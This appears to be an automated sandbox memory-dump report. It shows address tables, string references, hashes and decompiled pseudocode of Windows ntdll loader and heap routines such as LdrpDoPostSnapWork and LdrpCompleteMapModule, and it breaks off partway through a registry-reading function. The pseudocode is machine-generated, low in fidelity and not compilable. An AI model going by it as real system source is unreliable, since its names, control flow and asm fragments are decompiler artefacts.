0x015140f1
0x0157042d
0x0157044c
0x01570451
0x0157042f
0x01570444
0x01570449
0x0157045d
0x01570466
0x0157046e
0x01570474
0x01570475
0x0157047a
0x0157048a
0x0157048c
0x01570493
0x01570494
0x01570494
0x00000000
0x0157049b
0x00000000

Strings

HEAP: , xrefs: 0157044C
RtlAllocateHeap, xrefs: 01570468
, passed to %s, xrefs: 01570469
Invalid heap signature for heap at %p, xrefs: 01570458
HEAP[%wZ]: , xrefs: 0157043F

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: c8809f2fac93ef0385b08a6a5bbfadcb3a20c9d6d271054b573e2002300ec828
Instruction ID: 952a4477d6f02208c9b561ce90f961fa75de1ac97485c76dc8a2c2c809b1911c
Opcode Fuzzy Hash: c8809f2fac93ef0385b08a6a5bbfadcb3a20c9d6d271054b573e2002300ec828
Instruction Fuzzy Hash: 9F01D832154252AEE32A976AF80EF5677F5FB47B30F2A406EF1094F7958BB49440C251

Uniqueness

Uniqueness Score: -1.00%

Function 01548E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01548E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x160d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1608464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1605780 & 0x00000003) != 0) {
							E01595510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1605780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0155B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1607984; // 0xfe2b00
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1608464; // 0x74b10110
					 *0x160b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01549B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1605780 & 0x00000005) != 0) {
						_push(_t49);
						E01595510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01548e0f
0x01548e16
0x01548e19
0x01548e1b
0x01548e21
0x01548e7f
0x01548e85
0x01589354
0x0158936c
0x01589371
0x0158937b
0x01589381
0x01589381
0x0158937b
0x01548e9d
0x01548e9d
0x01548e29
0x01548e2c
0x01548e38
0x01548e3e
0x01548e43
0x01548eb5
0x01548eb9
0x015892aa
0x015892af
0x015892e8
0x015892e8
0x015892af
0x01548eb9
0x01548e45
0x01548e53
0x01548e5b
0x01548e5f
0x01548e78
0x01548e78
0x01548e7d
0x01548ec3
0x01548ecd
0x01548ed2
0x01548ed2
0x01548ec5
0x01548ec5
0x00000000
0x01548e7d
0x01548e67
0x01548ea4
0x0158931a
0x00000000
0x00000000
0x01589320
0x01548ea4
0x01548e70
0x01589325
0x01589340
0x01589345
0x01589345
0x01548e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 01589357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0158932A
LdrpFindDllActivationContext, xrefs: 01589331, 0158935D
minkernel\ntdll\ldrsnap.c, xrefs: 0158933B, 01589367

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: d3835c5b2df7c324cd4463cf5624c68cdf8b9682c8254359b478dbe7646613eb
Instruction ID: b6393d02dbf3723b214eae45818871233661b2dff86acf06d6627b755735141a
Opcode Fuzzy Hash: d3835c5b2df7c324cd4463cf5624c68cdf8b9682c8254359b478dbe7646613eb
Instruction Fuzzy Hash: F0411A31A003169FDB37AADC8C4DB3EB7B5BB4465CF06456EDA056F261E7709CA08781

Uniqueness

Uniqueness Score: -1.00%

Function 015D49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 015D4A4A, 015D4A5D, 015D4A5F, 015D4AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 015D4A61
This is located in the %s field of the heap header., xrefs: 015D4AD6
HEAP[%wZ]: , xrefs: 015D4A3D, 015D4AB7

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: e7564b4ea823b810c47e8742f9285fe54f4061e10db3aef809346c7e8bf62af8
Instruction ID: 94bcea37238ebd617077d64b1db3e8216758e19494528afda80e199eb32eeb98
Opcode Fuzzy Hash: e7564b4ea823b810c47e8742f9285fe54f4061e10db3aef809346c7e8bf62af8
Instruction Fuzzy Hash: 13311231200141EFE331DB9DC889F6B77EAFB05A20F19446AF505CF651D7B0A984C76A

Uniqueness

Uniqueness Score: -1.00%

Function 01528794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01528794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0152934A() != 0) {
								_t159 = E0159A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1605780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01595510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1605780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0152849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01528999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01528999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1605c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1605c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01532280(_t92, 0x16086cc);
															_t94 = E015E9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E015461A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1605c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01528A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1605c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1605c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0155F380(_t136, 0x14f1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01532280(_t108, 0x16086cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E015461A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E015E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0152FFB0(_t118, _t156, 0x16086cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01559A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01528799
0x0152879d
0x015287a1
0x015287a3
0x015287a8
0x015287c3
0x015287c3
0x015287c8
0x015287d1
0x015287d4
0x015287d8
0x015287e5
0x015287ec
0x01579bfe
0x01579c00
0x01579c02
0x01579c08
0x01579c0d
0x01579c0f
0x01579c14
0x01579c2d
0x01579c32
0x01579c37
0x01579c3a
0x01579c3c
0x01579c42
0x01579c42
0x01579c3c
0x01579c02
0x015287da
0x015287df
0x015287e3
0x00000000
0x00000000
0x015287e3
0x015287f2
0x00000000
0x015287fb
0x015287fd
0x015287fe
0x0152880e
0x0152880f
0x01528810
0x01528814
0x0152881a
0x0152881c
0x0152881f
0x01528821
0x01528822
0x01528824
0x01528826
0x0152882c
0x0152882e
0x01579c48
0x01579c48
0x01528834
0x01528834
0x01528837
0x00000000
0x00000000
0x01528837
0x0152882e
0x0152883d
0x01528840
0x01528843
0x01528846
0x01528849
0x0152884c
0x0152884e
0x01528850
0x01528852
0x01528854
0x01528857
0x015288b4
0x015288b6
0x015288b6
0x01528859
0x01528859
0x01528859
0x01528861
0x01528866
0x0152886a
0x0152893d
0x01528941
0x00000000
0x01528947
0x01528947
0x0152894a
0x0152894c
0x00000000
0x01528952
0x01528955
0x0152895a
0x0152895d
0x0152895d
0x0152895f
0x01528961
0x01528961
0x01528968
0x00000000
0x00000000
0x0152896a
0x0152896b
0x0152896e
0x00000000
0x01528970
0x01528970
0x01528970
0x01528970
0x01528972
0x01528972
0x01528974
0x00000000
0x0152897a
0x0152897a
0x0152897d
0x00000000
0x01528983
0x01579c65
0x01579c6d
0x01579c72
0x01579c75
0x01579c75
0x01579c82
0x01579c86
0x01579c87
0x01579c88
0x01579c89
0x01579c8c
0x01579c90
0x01579c95
0x01579c97
0x01579ca0
0x01579ca3
0x01579ca9
0x01579ca9
0x00000000
0x01579ca9
0x01579ca3
0x00000000
0x01579c97
0x0152897d
0x00000000
0x01528974
0x01528988
0x01528992
0x01528996
0x00000000
0x01528996
0x0152894c
0x00000000
0x01528870
0x0152887b
0x0152887d
0x0152887f
0x01528881
0x01528884
0x01528884
0x01528886
0x01528889
0x0152888c
0x0152888e
0x01528891
0x01528891
0x01528898
0x00000000
0x00000000
0x0152889a
0x0152889b
0x0152889e
0x00000000
0x00000000
0x015288a0
0x015288a8
0x015288b0
0x015288b2
0x015288d3
0x015288d5
0x00000000
0x015288d7
0x015288db
0x015288dc
0x015288e0
0x015288e8
0x015288ee
0x015288f0
0x015288f3
0x015288fc
0x01528901
0x01528906
0x0152890c
0x0152890c
0x0152890f
0x01528916
0x01528917
0x01528918
0x01528919
0x0152891a
0x0152891f
0x01528921
0x01579c52
0x01579c55
0x01579c5b
0x01579cac
0x01579cc0
0x01579cc0
0x01579c55
0x01528927
0x01528927
0x0152892f
0x01528933
0x00000000
0x015288f5
0x015288f5
0x00000000
0x015288f7
0x015288f7
0x015288fa
0x00000000
0x00000000
0x00000000
0x00000000
0x015288fa
0x015288f5
0x015288f3
0x00000000
0x015288d5
0x00000000
0x015288b2
0x015288c9
0x00000000
0x015288c9
0x0152887f
0x0152886a
0x01528857
0x01528852
0x015288bf
0x015288bf
0x015287aa
0x015287ad
0x015287ae
0x015287b4
0x015287b5
0x015287b6
0x015287b8
0x015287bd
0x015287c1
0x015287f4
0x015287fa
0x00000000
0x00000000
0x00000000
0x015287c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01579C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01579C18
LdrpDoPostSnapWork, xrefs: 01579C1E

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 92fd4c15bbbdc08d33337fd1e94f93cc63d52b52b5d71e0de3ed078fb25f45c6
Instruction ID: 5709ef640a82299f9ccf65036061e064410809b98b3aa985b12ed994bb321206
Opcode Fuzzy Hash: 92fd4c15bbbdc08d33337fd1e94f93cc63d52b52b5d71e0de3ed078fb25f45c6
Instruction Fuzzy Hash: C2912572A00226DFEF19CF98D881A7E77F5FF96314B084469E905AF281D770E901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01527E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01527E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0152CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0151C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1605780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01595510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1605780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01537D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01537D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01597016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01537D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01537D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01597016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0154A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0151B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01527e4c
0x01527e50
0x01527e55
0x01527e58
0x01527e5d
0x01527e71
0x01527f33
0x01527e77
0x01527e77
0x01527e79
0x01527e79
0x01527e7e
0x01527f45
0x01579848
0x00000000
0x01579848
0x01527f4e
0x01527f53
0x01527f5a
0x00000000
0x00000000
0x0157985a
0x01579862
0x01579866
0x00000000
0x0157986c
0x00000000
0x0157986c
0x01527e84
0x01527e84
0x01527e8d
0x01579871
0x01527eb8
0x01527ec0
0x01527ec0
0x01527e9a
0x0157987e
0x00000000
0x00000000
0x01579884
0x0157988b
0x015798a7
0x015798ac
0x015798b1
0x015798b6
0x015798b8
0x015798b8
0x015798b9
0x00000000
0x015798b9
0x01527ea0
0x01527ea7
0x00000000
0x00000000
0x01527eac
0x01527eb1
0x01527ec6
0x01527ed0
0x015798cc
0x01527ed6
0x01527ed6
0x01527ed6
0x01527ede
0x01527ee3
0x015798e3
0x015798f0
0x01579902
0x015798f2
0x015798fb
0x015798fb
0x01579907
0x0157991d
0x0157991d
0x01579907
0x015798e3
0x01527ef0
0x01527f14
0x01527f14
0x01527f1e
0x01579946
0x01527f24
0x01527f24
0x01527f24
0x01527f2c
0x0157996a
0x01579975
0x01579975
0x0157997e
0x01579993
0x01579993
0x0157997e
0x00000000
0x01527ef2
0x01527efc
0x01527f0a
0x01527f0e
0x01579933
0x00000000
0x01579933
0x00000000
0x01527f0e
0x00000000
0x00000000
0x00000000
0x01527eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 015798A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01579891
LdrpCompleteMapModule, xrefs: 01579898

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: cd5fdb79edee497d99cda0332f54bac3df57663d74c4b215e2877b79a897aa4c
Instruction ID: c292e7991bb90c1d9aee190f8662924d6be936616df1d3a5cd77a239cf6d227f
Opcode Fuzzy Hash: cd5fdb79edee497d99cda0332f54bac3df57663d74c4b215e2877b79a897aa4c
Instruction Fuzzy Hash: FE51E232A047469FEB22CB6CC945B2A7BE4FB5A324F140959E9619F3E1D730E900CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0151E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0151E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0151F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E015595D0();
						}
						if(_t78 != 0) {
							L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0155FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0155BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01559600();
					if(_t97 < 0) {
						goto L6;
					}
					E0155BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0151F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0155BB40(_t83, _t102 + 0x24, _t78);
								if(L015243C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0155BB40(_t84, _t102 + 0x24, _t94);
									if(L015243C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0151e620
0x0151e628
0x0151e62f
0x0151e631
0x0151e635
0x0151e637
0x0151e63e
0x01575503
0x01575503
0x0151e64c
0x0151e64c
0x0151e651
0x00000000
0x00000000
0x0151e661
0x0151e665
0x0157542a
0x0151e715
0x0151e71a
0x0151e71c
0x0151e720
0x0151e720
0x0151e727
0x0151e736
0x0151e736
0x0151e743
0x0151e743
0x0151e673
0x0151e678
0x0151e67d
0x0151e682
0x0151e685
0x0151e692
0x0151e69b
0x0151e6a3
0x0151e6ad
0x0151e6b1
0x0151e6b2
0x0151e6bb
0x0151e6bf
0x0151e6c0
0x0151e6c8
0x0151e6cc
0x0151e6d5
0x0151e6d9
0x00000000
0x00000000
0x0151e6e5
0x0151e6ea
0x0151e6f9
0x0151e70b
0x0151e70f
